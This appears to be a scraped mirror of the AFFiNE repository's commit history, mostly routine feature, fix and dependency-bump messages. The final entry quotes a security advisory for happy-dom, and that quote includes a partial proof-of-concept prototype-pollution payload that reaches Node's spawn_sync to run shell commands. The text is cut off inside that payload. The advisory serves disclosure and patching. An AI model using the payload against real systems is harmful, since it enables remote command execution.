mirror of
https://github.com/toeverything/AFFiNE.git
synced 2026-02-04 08:38:34 +00:00
17f2ebc4deac379a2ad00d40e98d3bd64f953d12
10955 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
3720
|
6ec1948f62 |
feat(editor): release callout (#13896)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Refactor** * Callout is no longer gated as an experimental option — it now consistently appears in the editor’s slash menu and toolbar where applicable. * **Tests** * End-to-end slash-menu tests updated to expect the Callout item in search results and adjusted item ordering. * **Chores** * Repository ignore rules updated to exclude .kiro files. <!-- end of auto-generated comment: release notes by coderabbit.ai -->v0.25.4 |
||
|
DarkSky
|
7e6ead4232 | feat: native doc reader (#13881) | ||
|
Hongxu Xu
|
02dcfdcc40 |
chore(native): remove unused deps (#13854)
Identified some unused dependencies and refactored them. |
||
|
Vitaly Barakov
|
5a2f508dac |
feat(editor): hidden 'add icon' label on print if icon is not set (#13868)
This caption (see screenshot) is added when you try to print doc, even if there is no icon. <img width="1269" height="897" alt="изображение" src="https://github.com/user-attachments/assets/d63383e6-48a2-44fb-8f32-ae91d1e9e8c6" /> |
||
|
Martin Pauli
|
2bd9f1a353 |
feat: implement tray and minimize behaviors (#13851)
This PR introduces new window behaviors, which can be enabled when the menubar setting is active: New Features: - Quick open from tray icon - Minimize to tray - Exit to tray - Start minimized These changes have not yet been tested on macOS. <img width="645" height="479" alt="image" src="https://github.com/user-attachments/assets/7bdd13d0-5322-45a4-8e71-85c081aa0c86" /> <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Configurable menubar/tray behaviors: open on left-click, minimize to tray, close to tray (exit to tray), and start minimized. * **UI** * Appearance settings add a Menubar → Window Behavior group with four toggles; group shows only when menubar/tray is enabled (hidden on macOS). * **Settings** * Tray settings persisted and exposed via the settings API with getters and setters for each option. * **Localization** * Added translation keys and English strings for the new controls and descriptions. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: Peng Xiao <pengxiao@outlook.com> |
||
|
Vitaly Barakov
|
9f6ea83ac1 |
fix(editor): linked doc popover close when layout is switched (#13867)
Fixing the disappearing linked doc menu called by @ when switching language using Alt+Shift. |
||
|
DarkSky
|
d33df659f8 | feat: check server type in chat (#13875) | ||
|
Peng Xiao
|
c9a4129a3e | fix: a security issue related to open external (#13864) | ||
|
DarkSky
|
dd676611ce | test: fix mock api v0.25.3-beta.0 v0.25.3 | ||
|
Lakr
|
f3bb2be5ef | feat: request apply subscription mutation (#13844) | ||
|
DarkSky
|
8535b3dc41 | feat(server): refresh subscription if event is from anonymous account (#13840) | ||
|
DarkSky
|
89cc9b072b |
feat(server): early subscription for iap (#13826)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added a mutation to request/apply a subscription by transaction ID (client mutation and server operation), returning subscription details. * **Bug Fixes / Improvements** * More robust external subscription sync with safer conflict detection, optional short-lived confirmation, improved parsing and error logging. * **Chores** * Standardized time constants for clarity. * **Tests** * Updated subscription test data (expiration date) to reflect new lifecycle expectations. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
e4b5b24fdd | chore: bump package version | ||
|
DarkSky
|
9904f50e0b |
feat(server): improve crypto (#13822)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Resolved cryptographic compatibility issues with OpenSSL 3.x. * **New Features** * Broader support for multiple key types for signing and verification. * OTP generation adjusted (affects digit distribution/values). * **Refactor** * Internal cryptographic key handling reworked for improved stability, compatibility, and multi-key-type support. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
b7ac7caab4 |
chore(server): improve transcript stability (#13821)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Enhanced audio/video detection for MP4 files to better distinguish audio-only vs. video. * **Dependencies** * Added MP4 parsing dependency and updated AI provider libraries (Anthropic, Google, OpenAI, etc.). * **Bug Fixes** * Tightened authentication state validation for magic-link/OTP flows. * Stricter space-join validation to reject invalid client types/versions. * Improved transcript entry deduplication and data handling. * **API** * Transcript submit payload now requires infos and removes deprecated url/mimeType fields. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
Kandula Ramesh Kumar
|
d74087fdc5 |
fix(blocksuite): stabilize cross-document clipboard snapshot handling (#13817)
This PR addresses issue Fixes: #13805 (cross-document copy/paste not working). Locally verified that: - Copy → paste between two documents now works consistently. - Clipboard snapshot payload remains intact when encoded/decoded. - External paste (e.g., to Notepad or browser text field) functions correctly. E2E tests for clipboard behavior were added, but Playwright browsers could not be installed in the container (`HTTP 403` from CDN). Manual verification confirms the fix works as intended. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Tests** * Added cross-document clipboard regression tests for copy/paste between documents, external clipboard validation, and multi-block copy; duplicate test entries noted. * **Chores** * Minor formatting and whitespace cleanup around clipboard handling. * Improved error handling in paste flows. * Standardized HTML formatting for clipboard payload attributes. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
875565d08a |
fix(server): avoid a snowball effect of email sending failures (#13818)
fix #13802 |
||
|
DarkSky
|
0ecd915245 | docs: update readme | ||
|
OrbisAI Sec
|
b5ebd20314 |
fix(core): prevent container privilege escalation in .devcontainer/docker-compose.yml (#13814)
**Context and Purpose:** This PR automatically remediates a security vulnerability: - **Description:** Service 'app' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this. - **Rule ID:** yaml.docker-compose.security.no-new-privileges.no-new-privileges - **Severity:** HIGH - **File:** .devcontainer/docker-compose.yml - **Lines Affected:** 4 - 4 This change is necessary to protect the application from potential security risks associated with this vulnerability. **Solution Implemented:** The automated remediation process has applied the necessary changes to the affected code in `.devcontainer/docker-compose.yml` to resolve the identified issue. Please review the changes to ensure they are correct and integrate as expected. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Enhanced security configuration for the development environment. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
c102e2454f |
feat(server): fetch missing field from rcat (#13794)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Performance** * Added caching mechanism for subscription product data to reduce API calls and improve response times. * **Improvements** * Enhanced asynchronous processing of subscription entitlements for more reliable product data retrieval from the payment provider. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
DarkSky
|
5fc3258a3d |
feat(server): expose mail server name config in admin dashboard (#13792)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added SMTP name configuration field to notification settings. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
renovate[bot]
|
1a9863d36f |
chore: bump up opentelemetry (#12651)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics)) | [`^0.35.4` -> `^0.36.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.35.5/0.36.2) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.47.0` -> `^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.47.1/0.55.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.47.0` -> `^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.47.1/0.55.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.44.0` -> `^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.44.1/0.54.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.46.0` -> `^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.46.1/0.54.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/exporter-prometheus)</summary> ### [`v0.207.0`]( |
||
|
dependabot[bot]
|
35c2ad262f |
chore: bump next from 15.3.2 to 15.5.4 (#13739)
Bumps [next](https://github.com/vercel/next.js) from 15.3.2 to 15.5.4. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/vercel/next.js/releases">next's releases</a>.</em></p> <blockquote> <h2>v15.5.4</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: ensure onRequestError is invoked when otel enabled (<a href="https://redirect.github.com/vercel/next.js/issues/83343">#83343</a>)</li> <li>fix: devtools initial position should be from next config (<a href="https://redirect.github.com/vercel/next.js/issues/83571">#83571</a>)</li> <li>[devtool] fix overlay styles are missing (<a href="https://redirect.github.com/vercel/next.js/issues/83721">#83721</a>)</li> <li>Turbopack: don't match dynamic pattern for node_modules packages (<a href="https://redirect.github.com/vercel/next.js/issues/83176">#83176</a>)</li> <li>Turbopack: don't treat metadata routes as RSC (<a href="https://redirect.github.com/vercel/next.js/issues/82911">#82911</a>)</li> <li>[turbopack] Improve handling of symlink resolution errors in track_glob and read_glob (<a href="https://redirect.github.com/vercel/next.js/issues/83357">#83357</a>)</li> <li>Turbopack: throw large static metadata error earlier (<a href="https://redirect.github.com/vercel/next.js/issues/82939">#82939</a>)</li> <li>fix: error overlay not closing when backdrop clicked (<a href="https://redirect.github.com/vercel/next.js/issues/83981">#83981</a>)</li> <li>Turbopack: flush Node.js worker IPC on error (<a href="https://redirect.github.com/vercel/next.js/issues/84077">#84077</a>)</li> </ul> <h3>Misc Changes</h3> <ul> <li>[CNA] use linter preference (<a href="https://redirect.github.com/vercel/next.js/issues/83194">#83194</a>)</li> <li>CI: use KV for test timing data (<a href="https://redirect.github.com/vercel/next.js/issues/83745">#83745</a>)</li> <li>docs: september improvements and fixes (<a href="https://redirect.github.com/vercel/next.js/issues/83997">#83997</a>)</li> </ul> <h3>Credits</h3> <p>Huge thanks to <a href="https://github.com/yiminghe"><code>@yiminghe</code></a>, <a href="https://github.com/huozhi"><code>@huozhi</code></a>, <a href="https://github.com/devjiwonchoi"><code>@devjiwonchoi</code></a>, <a href="https://github.com/mischnic"><code>@mischnic</code></a>, <a href="https://github.com/lukesandberg"><code>@lukesandberg</code></a>, <a href="https://github.com/ztanner"><code>@ztanner</code></a>, <a href="https://github.com/icyJoseph"><code>@icyJoseph</code></a>, <a href="https://github.com/leerob"><code>@leerob</code></a>, <a href="https://github.com/fufuShih"><code>@fufuShih</code></a>, <a href="https://github.com/dwrth"><code>@dwrth</code></a>, <a href="https://github.com/aymericzip"><code>@aymericzip</code></a>, <a href="https://github.com/obendev"><code>@obendev</code></a>, <a href="https://github.com/molebox"><code>@molebox</code></a>, <a href="https://github.com/OoMNoO"><code>@OoMNoO</code></a>, <a href="https://github.com/pontasan"><code>@pontasan</code></a>, <a href="https://github.com/styfle"><code>@styfle</code></a>, <a href="https://github.com/HondaYt"><code>@HondaYt</code></a>, <a href="https://github.com/ryuapp"><code>@ryuapp</code></a>, <a href="https://github.com/lpalmes"><code>@lpalmes</code></a>, and <a href="https://github.com/ijjk"><code>@ijjk</code></a> for helping!</p> <h2>v15.5.3</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: validation return types of pages API routes (<a href="https://redirect.github.com/vercel/next.js/issues/83069">#83069</a>)</li> <li>fix: relative paths in dev in validator.ts (<a href="https://redirect.github.com/vercel/next.js/issues/83073">#83073</a>)</li> <li>fix: remove satisfies keyword from type validation to preserve old TS compatibility (<a href="https://redirect.github.com/vercel/next.js/issues/83071">#83071</a>)</li> </ul> <h3>Credits</h3> <p>Huge thanks to <a href="https://github.com/bgub"><code>@bgub</code></a> for helping!</p> <h2>v15.5.2</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: disable unknownatrules lint rule entirely (<a href="https://redirect.github.com/vercel/next.js/issues/83059">#83059</a>)</li> <li>revert: add ?dpl to fonts in /_next/static/media (<a href="https://redirect.github.com/vercel/next.js/issues/83062">#83062</a>)</li> </ul> <h3>Credits</h3> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
Martijn Smit
|
a0613b6306 |
feat(core): enhance Notion import with folder hierarchy and page icons (#13692)
Hi 👋 Love what you're doing with AFFiNE, I found my Notion replacement in this app. Coming from Notion and importing my workspaces, I saw the need to improve the import functionality to replicate the folder hierarchy from Notion into the AFFiNE folder structure in the `Organize` section. There are a few issues(i.e. #12961 and #13629 ) of people that expected the same behavior. This should make it a lot easier for people to move over. ### Technical description Improve Notion import functionality to preserve organizational structure and page icons from exports: - Add folder hierarchy preservation during Notion import - Extract and set page icons (emoji and image) from Notion HTML - Integrate with OrganizeService to recreate folder structure - Use ExplorerIconService to apply page icons to imported documents - Tested using production workspace exports from Notion, several thousand pages and multiple hierarchy levels deep. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - New Features - Imports from Notion/HTML now recreate folder hierarchies and link imported pages into that structure. - Page icons (emoji and supported images) are extracted and attached to imported pages. - Import results now include the created root folder for quick access. - Improvements - Import flows integrate folder creation and icon assignment with non-blocking error handling. - Bug Fixes - Avoids including undefined page IDs in successful imports. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: DarkSky <darksky2048@gmail.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
renovate[bot]
|
c18840038f |
chore: bump up @sentry/electron version to v7 (#13652)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@sentry/electron](https://redirect.github.com/getsentry/sentry-electron) | [`^6.1.0` -> `^7.0.0`](https://renovatebot.com/diffs/npm/@sentry%2felectron/6.6.0/7.2.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>getsentry/sentry-electron (@​sentry/electron)</summary> ### [`v7.2.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#720) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.1...7.2.0) - feat: Update JavaScript SDKs from [v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0) to [v10.17.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.17.0) - feat: Log os and device attributes ([#​1246](https://redirect.github.com/getsentry/sentry-electron/issues/1246)) ### [`v7.1.1`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#711) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.0...7.1.1) - fix: Preload injection path ([#​1243](https://redirect.github.com/getsentry/sentry-electron/issues/1243)) - fix: Preload `contextIsolation` issues ([#​1244](https://redirect.github.com/getsentry/sentry-electron/issues/1244)) - fix: Include `sentry.origin` with auto-generated logs ([#​1241](https://redirect.github.com/getsentry/sentry-electron/issues/1241)) ### [`v7.1.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#710) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.0.0...7.1.0) - feat: Update JavaScript SDKs from [v10.7.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.7.0) to [v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0) ([#​1236](https://redirect.github.com/getsentry/sentry-electron/issues/1236)) - feat: Optional Namespaced IPC ([#​1234](https://redirect.github.com/getsentry/sentry-electron/issues/1234)) - fix: Export `ErrorEvent` type ([#​1229](https://redirect.github.com/getsentry/sentry-electron/issues/1229)) - fix: Only capture logs if `enableLogs` is true ([#​1235](https://redirect.github.com/getsentry/sentry-electron/issues/1235)) ### [`v7.0.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#700) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.11.0...7.0.0) This release updates the underlying Sentry JavaScript SDKs to v10 which includes some breaking changes. Check out the the [migration guide](./MIGRATION.md) for more details. - feat: Update JavaScript SDKs to v10.8.0 ([#​1205](https://redirect.github.com/getsentry/sentry-electron/issues/1205)) ### [`v6.11.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6110) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.10.0...6.11.0) - feat: Update JavaScript SDKs from [v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0) to [v9.46.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.46.0) - fix: Ensure native directory ends up in package ([#​1216](https://redirect.github.com/getsentry/sentry-electron/issues/1216)) ### [`v6.10.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6100) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.9.0...6.10.0) - feat: Update JavaScript SDKs from [v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0) to [v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0) - fix: Don't use `deepmerge` to merge events to remove circular ref. issues ([#​1210](https://redirect.github.com/getsentry/sentry-electron/issues/1210)) - fix: Support `node16` for TypeScript `moduleResolution` ([#​1203](https://redirect.github.com/getsentry/sentry-electron/issues/1203)) ### [`v6.9.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#690) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.8.0...6.9.0) - feat: Update JavaScript SDKs from [v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0) to [v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0) - feat: Add `eventLoopBlockIntegration` ([#​1188](https://redirect.github.com/getsentry/sentry-electron/issues/1188)) - feat: Move renderer event loop block detection to an integration ([#​1196](https://redirect.github.com/getsentry/sentry-electron/issues/1196)) ### [`v6.8.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#680) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.7.0...6.8.0) - feat: Update JavaScript SDKs from [v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0) to [v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0) - fix: Don't capture stack traces from destroyed renderers ([#​1165](https://redirect.github.com/getsentry/sentry-electron/issues/1165)) ### [`v6.7.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#670) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.6.0...6.7.0) - feat: Update JavaScript SDKs from [v9.18.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.18.0) to [v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0) - feat: Add structured logging support ([#​1159](https://redirect.github.com/getsentry/sentry-electron/issues/1159)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzAuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE0My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
congzhou09
|
e2de0e0e3d |
fix(editor): add trash state for linked-doc and synced-doc appearance (#13767)
This PR updates the appearance of `embed-linked-doc-block` and `embed-synced-doc-block` to reflect the trashed state of their linked documents. Previously, these blocks showed no visual difference whether the linked document was trashed or not, despite the existing of codes for deletion-related appearance. This change ensures that the deletion appearance is properly displayed.  <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Documents now support trash state tracking for improved deletion management * **Bug Fixes** * Improved synchronization and refresh of embedded documents when document states change * Enhanced handling of trashed documents in embedded content <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
Juan Abimael Santos Castillo
|
6fb0ff9177 |
chore(native): simplify Array::get method with functional approach (#13771)
## Issue The Array::get method used verbose nested Option handling with redundant returns, making the code longer and less Rust idiomatic. ## Solution Replaced the nested if let structure with a functional and_then approach that: - Eliminates redundant return keyword usage - Flattens Option handling for cleaner logic - Reduces code from 13 lines to 9 lines - Maintains identical functionality ## Result More idiomatic Rust code that's easier to read and maintain, with all tests passing. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Refactor** * Improved internal code structure with functional programming patterns for enhanced maintainability. No visible changes to end-user functionality. <!-- end of auto-generated comment: release notes by coderabbit.ai --> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
Cats Juice
|
c2fb6adfd8 |
feat(mobile): add discord link in setting (#13789)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added a new Discord community link in the mobile settings Others section with an animated "Hot" badge * **Localization** * Added multilingual support for the new Discord link across all supported languages <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
Lakr
|
8aeb8bd0ca |
feat(ios): insert app user id to rc (#13756)
This pull request integrates RevenueCat into the iOS paywall system, enabling user authentication and subscription management through the RevenueCat SDK. It introduces new dependencies, updates the paywall plugin initialization, and adds logic to fetch and use the current user identifier from the web context for RevenueCat login. The most important changes are grouped below: **RevenueCat Integration and Configuration:** * Added `purchases-ios-spm` (RevenueCat) as a Swift Package dependency in `AffinePaywall` and updated `Package.resolved` to track the new dependency. (`packages/frontend/apps/ios/App/Packages/AffinePaywall/Package.swift`, `packages/frontend/apps/ios/App/App.xcworkspace/xcshareddata/swiftpm/Package.resolved`) [[1]](diffhunk://#diff-7716c691e65a220dad542e024fbf91547c45ea69ddff1d0b6a002a497cd7c8ecR20-R28) [[2]](diffhunk://#diff-63609de9bdfc08b8a0691a4f0ddb7ddff07ae76b40ec2ee7c12adb7db226eb3cR48-R56) * Implemented `Paywall.setup()` for initializing RevenueCat configuration, including setting log level, proxy URL, and a static API key. (`packages/frontend/apps/ios/App/Packages/AffinePaywall/Sources/AffinePaywall/Paywall.swift`, `packages/frontend/apps/ios/App/Plugins/PayWall/PayWallPlugin.swift`) [[1]](diffhunk://#diff-bce0a21a4e7695b7bf2430cd6b8a85fbc84124cc3be83f3288119992b7abb6cdR8-R30) [[2]](diffhunk://#diff-1854d318d8fd8736d078f5960373ed440836263649a8193c8ee33e72a99424edR14) **User Authentication and Subscription State:** * Enhanced the paywall ViewModel logic to fetch the current user identifier from the web context (`window.getCurrentUserIdentifier`), configure RevenueCat, and log in the user before fetching subscription state. Improved error handling and ensured external entitlement fetching is robust. (`packages/frontend/apps/ios/App/Packages/AffinePaywall/Sources/AffinePaywall/Model/ViewModel+Action.swift`) [[1]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbR9) [[2]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbL120-R155) [[3]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbR165) * Added a global JavaScript function `getCurrentUserIdentifier` to the iOS web context to retrieve the current user's account ID for use in RevenueCat login. (`packages/frontend/apps/ios/src/app.tsx`) **Project Metadata:** * Downgraded the `objectVersion` in the Xcode project file, possibly to maintain compatibility with other tools or environments. (`packages/frontend/apps/ios/App/App.xcodeproj/project.pbxproj`) <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Paywall now initializes automatically for a smoother subscription flow. * New global API to retrieve the current user identifier from the app context. * **Improvements** * Added integration to better coordinate subscription/login state before showing paywall options. * Ensures user identity is validated prior to entitlement checks, improving accuracy. * Improved error messages and logging during purchase/login flows. * **Bug Fixes** * Fixed intermittent issues where subscription status could fail to load or appear outdated. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
renovate[bot]
|
a47042cbd5 |
chore: bump up happy-dom version to v20.0.2 [SECURITY] (#13765)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`20.0.0` -> `20.0.2`](https://renovatebot.com/diffs/npm/happy-dom/20.0.0/20.0.2) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-62410](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5) ### Summary The mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads. ### Details The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (univeral) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf). ### PoC Attackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., "process". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn(). ```js import { Browser } from "happy-dom"; const browser = new Browser({settings: {enableJavaScriptEvaluation: true}}); const page = browser.newPage({console: true}); page.url = 'https://example.com'; let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof 